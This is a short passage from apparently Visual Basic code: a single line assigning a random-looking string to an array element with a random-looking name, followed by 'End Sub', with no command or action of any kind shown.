QAUBRNSVSNMDMQPJ$(30) = "FTDJILLLBBPSNPOGPD"

End Sub

